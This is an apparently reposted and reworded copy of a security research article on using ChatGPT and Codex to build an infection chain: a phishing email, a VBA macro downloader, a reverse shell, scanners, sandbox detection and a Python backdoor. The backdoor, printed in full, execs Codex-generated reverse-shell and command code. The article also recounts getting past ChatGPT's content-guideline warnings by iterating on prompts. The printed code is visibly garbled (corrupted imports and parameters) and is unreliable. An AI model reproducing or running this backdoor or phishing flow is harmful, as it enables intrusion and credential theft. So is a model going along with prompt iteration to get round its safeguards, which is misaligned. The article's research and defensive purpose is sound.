AI that can save the day or hack it away

AI that can save the day or hack it away

OpwnAI

Introduction

Because of ChatGPT, OpenAI’s release of the new interface for its large language model (LLM) has seen an explosion of interest in general artificial intelligence in the media and on social networks in recent weeks. This model is used in many applications across the web and has been praised for its ability to generate well-written code and aid the development process. However, this new technology also carries risks. Lowering the bar for code generation, for example, can help less skilled threat actors launch cyberattacks without difficulty. In this article, Check Point Research states:

  • How artificial intelligence (AI) models can be used to create a full infection flow, from spear-phishing to running a reverse shell.
  • How researchers created an additional backdoor that dynamically runs scripts that AI generates on the fly.
  • Examples of the positive effect of OpenAI on the defense side and how it can help researchers in their daily work.

The world of cyber security is changing rapidly. It is crucial to emphasize the importance of being vigilant about how this new and developing technology can affect the threat landscape, both for better and for worse. While this new technology helps defenders, it also lowers the necessary bar of entry for low-skilled threat actors to run phishing campaigns and develop malware.

Background

From image generation to writing code, AI models have made huge strides in several fields with the famous AlphaGo software that beat the best professionals in the game of Go in 2016, to improved speech recognition and machine translation that brought the world virtual assistants like Siri and Alexa playing a big role in our daily lives.

Recently, public interest in AI increased due to the release of ChatGPT, a prototype chatbot whose “purpose is to assist with a wide range of tasks and answer questions to the best of its ability.” Unless you’ve been disconnected from social media for the past few weeks, you’ve most likely seen countless photos of ChatGPT interactions, from writing poetry to answering programming questions.

But like any technology, ChatGPT’s increased popularity also brings increased risk. For example, Twitter is filled with examples of malicious code or dialogs generated by ChatGPT. Although OpenAI has invested huge efforts to stop abuse of its AI, it can still be used to produce dangerous code.

To illustrate this, we decided to use ChatGPT and another platform, OpenAI’s Codex, an AI-based system that translates natural language into code, most suitable in Python, but capable in other languages. We created a full infection flow and gave ourselves the following limitation: We didn’t write a single line of code and instead let the AIs do all the work. We just put the pieces of the puzzle together and execute the resulting attack.

We chose to illustrate our point with a single execution flow, a phishing email containing a malicious Excel file armed with macros that downloads a reverse shell (one of the favorites among cybercriminals).

ChatGPT: The Talented Phisher

In the first step, we created a plausible phishing email. This cannot be done by Codex, which can only generate code, so we asked ChatGPT to help and suggested it impersonate a hosting company.

Figure 1 – Basic phishing email generated by ChatGPT

Please note that while OpenAI mentions that this content may violate its content guidelines, the production is off to a good start. In further interaction with ChatGPT, we can clarify our requirements: to avoid hosting an additional phishing infrastructure, we want the target to download only an Excel document. Simply asking ChatGPT to iterate again makes for an excellent phishing email:

Figure 2 – Phishing email generated by ChatGPT

The iteration process is essential for working with the model, especially for code. The next step, creating the malicious VBA code in the Excel document, also requires several iterations.
This is the first prompt:

Figure 3 – Simple VBA code generated by ChatGPT

This code is very naive and uses libraries like WinHttpReq. However, after some short iteration and back and forth chatting, ChatGPT produces better code:

Figure 4 – Another version of the VBA code

This is still a very basic macro, but we decided to stop here, since obfuscating and refining VBA code can be a never-ending procedure. ChatGPT proved that given good text messages, it can give you working malicious code.

Codex – an artificial intelligence, or the future name of an implant?

Armed with the knowledge that ChatGPT can produce malicious code, we were curious to see what Codex, whose original purpose is to translate natural language into code, can do. In what follows, all code was written by Codex. We intentionally demonstrate the most basic implementations of each technique to illustrate the idea without sharing too much malicious code.

We first asked it to create a basic reverse shell for us using a placeholder IP and port. The query is the comment at the beginning of the code block.

Figure 5 – Basic reverse shell generated by Codex

This is a great start, but it would be nice if there were some malicious tools we could use to help us with our intrusion. Maybe some scanning tools, such as checking if a service is open to SQL injection and port scanning?

Figure 6 – The most basic implementation if SQLi generated by Codex

Figure 7 – Basic port scan script

This is also a good start, but we will also add some mitigations to make the life of the defenders a little more difficult. Can we detect if our program is running in a sandbox? The basic answer given by the Codex is below. Of course, it can be improved by adding other providers and additional checks.

Figure 8 – Basic sandbox detection script

We see that we are making progress. However, this is all standalone Python code. Even if an AI assembles this code for us (which it can), we cannot be sure that the infected machine will have an interpreter. To find a way to make it run on any Windows machine, the easiest solution might be to compile it into an exe. Once again, our AI friends come through for us:

Figure 9 – Conversion from python to exe

And just like that, the flow of infection is complete. We created a phishing email, with an attached Excel document containing malicious VBA code that downloads a reverse shell to the target machine. The hard work was done by the AIs and all that’s left for us to do is execute the attack.

No knowledge in scripting? Don’t worry, English is good enough

We were curious to see how far down the rabbit hole goes. Creating the initial scripts and modules is fine, but a real cyberattack requires flexibility as the attackers’ needs during an intrusion can change rapidly depending on the infected environment. To see how we can leverage AI’s ability to create code on the fly to respond to this dynamic need, we created the following short Python code. After being compiled into a PE, the exe first runs the previously mentioned reverse shell. Afterwards it waits for commands with -cmd flags and runs Python scripts generated on the fly by querying the Codex API and giving it a simple message in English.

import us

import sys

import openai

import argparse

import socket

import wine reg

openai.api_key =

parser = argparse.ArgumentParser()

parser.add_argument(‘-cmd’, type=ascii, help=’Prompt that will be run on infected machine’)

args = parser.parse_args()

def ExecuteReverseShell():

response = openai.Completion.create(

model=”code-davinci-002″,

prompt=”\”\”\”\nRun reverse shell script on a Windows machine and connect to IP address gate .\n\”\”\””,

temperature=0,

max_tokens=1000,

top_p=1,

frequency_penalty=0,

presence penalty=0

)

exec(response.choice[0].text)

def ExecutePrompt(prompt):

response = openai.Completion.create(

model=”code-davinci-002″,

prompt=”\”\”\”\n”+prompt+”\n\”\”\””,

temperature=0,

max_tokens=1000,

top_p=1,

frequency_penalty=0,

presence penalty=0

)

exec(response.choice[0].text)

if __name__ == ‘__main__’:

if len(sys.argv) == 1:

ExecuteReverseShell()

if args.cmd:

ExecutePrompt(args.cmd)

Now that we have a few examples of executing the script below, we leave the possible vectors for developing this type of attack to a curious reader:

Figure 10 – Execution of the code generated on the fly based on input in English

Using the Codex to expand defenders

Up to this point, we have presented the threat actor’s perspective using LLM. To be clear, the technology itself is not malicious and can be used by all parties. As attack processes can be automated, so can mitigating measures on the defenders’ side.

To illustrate this, we asked Codex to write two simple Python functions: one that helps search for URLs inside files using the YARA package, and another that queries VirusTotal for the number of detections of a specific hash . While there are better existing open source implementations of these scripts written by the defense community, we hope to spark the imaginations of blue teamers and threat hunters to use the new LLMs to automate and improve their work.

Figure 11 – VT API query to check the number of detections for a hash

Figure 12 – Yara script that checks which URL strings are in a file

Conclusion

The growing roles of LLM and AI in the cyber world are full of opportunities, but also come with risks. While the code and infection flow presented in this article can be defended against using simple procedures, this is only a rudimentary showcase of the impact of AI research on cybersecurity. Multiple scripts can be easily generated, with slight variations using different wordings. Complex attack processes can also be automated using LLM’s APIs to generate other malicious artifacts. Defenders and threat hunters should be vigilant and careful to adopt this technology quickly, or our society will be one step behind the attackers.

See also  Woman's 'quick and easy' leg shave - 'I've been doing it wrong for 20 years'

You may also like...

Leave a Reply

Your email address will not be published. Required fields are marked *